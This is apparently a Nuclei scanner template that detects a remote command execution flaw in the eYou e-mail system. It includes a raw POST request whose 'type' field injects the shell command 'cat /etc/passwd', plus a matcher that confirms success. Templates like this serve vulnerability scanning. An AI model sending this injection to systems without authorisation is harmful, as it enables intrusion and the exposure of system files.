nuclei-templates/vulnerabilities/other/eyou-email-rce.yaml

33 lines
800 B
YAML

id: eyou-email-rce
info:
name: eYou E-Mail system RCE
author: pikpikcu
severity: critical
reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
tags: rce,eyou
requests:
- raw:
- |
POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chro·me/89.0.4389.114 Safari/537.36
Content-Length: 25
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
type='|cat /etc/passwd||'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
part: body
- type: status
status:
- 200